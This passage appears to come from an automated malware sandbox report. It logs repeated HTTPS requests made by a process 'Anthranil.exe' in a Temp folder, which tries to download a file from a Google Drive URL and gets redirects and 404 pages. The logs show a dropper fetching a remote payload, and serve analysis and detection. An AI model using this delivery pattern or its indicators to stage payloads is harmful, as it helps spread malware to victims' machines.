                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 51 58 4e 69 51 4f 53 2d 76 75 35 67 6d 64 6a 6a 63 31 4f 66 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3QXNiQOS-vu5gmdjjc1Ofw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.449326216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:04 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:04 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:04 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-EdnXOrREbmQYDhtdl6x_6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.449327142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:05 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:05 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgR2QAmeHHnKsM1SzUUdkRWxTj6Owy4_t9bfFzuMkuoe92I_zo3QVOCae77XNB2agFfF
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:05 GMT
                                                                                  Content-Security-Policy: script-src 'nonce-FMuHsHtv33afmVkPvPyEWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 2d 59 76 5a 58 6c 74 54 6a 63 66 33 51 38 2d 4f 4a 53 39 36 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a-YvZXltTjcf3Q8-OJS96g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.449328216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:06 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:06 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:06 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-rdCnHD50L5VZiTfez4iJ-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.449329142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:07 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:07 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFiumC6Iy_Dwv3OzE1-NvGJHrgIpFtOHAhqeGkRprAyrX9rFMxK_EJDQJyXpKxJxFkllbbrs2uDINI4
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:07 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: script-src 'nonce-yebyOCxsHm-fw_6IbCDaUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 43 4b 46 66 5a 76 65 4d 79 79 4f 4f 4b 72 76 2d 33 59 78 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ECKFfZveMyyOOKrv-3YxzQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.449330216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:08 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:08 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:08 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'nonce-e6mOhMOcYNl9NI6E9pJ9HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.449331142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:09 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:09 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTkcsJonDknn8WKqD6Xw13NFJXQMMMaMddybhhs52LvAol18cfi-EJzIDTQs6Qpa_R3
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:09 GMT
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-IiGMfMYpvzdZ5uW2MfiawQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 44 5a 6d 37 2d 32 4e 62 6c 33 56 4a 56 63 6d 52 6b 4a 74 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fDZm7-2Nbl3VJVcmRkJtZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.449332216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:10 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:11 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:11 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-RI1i7CYsOzWEVMSm1-99mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.449333142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
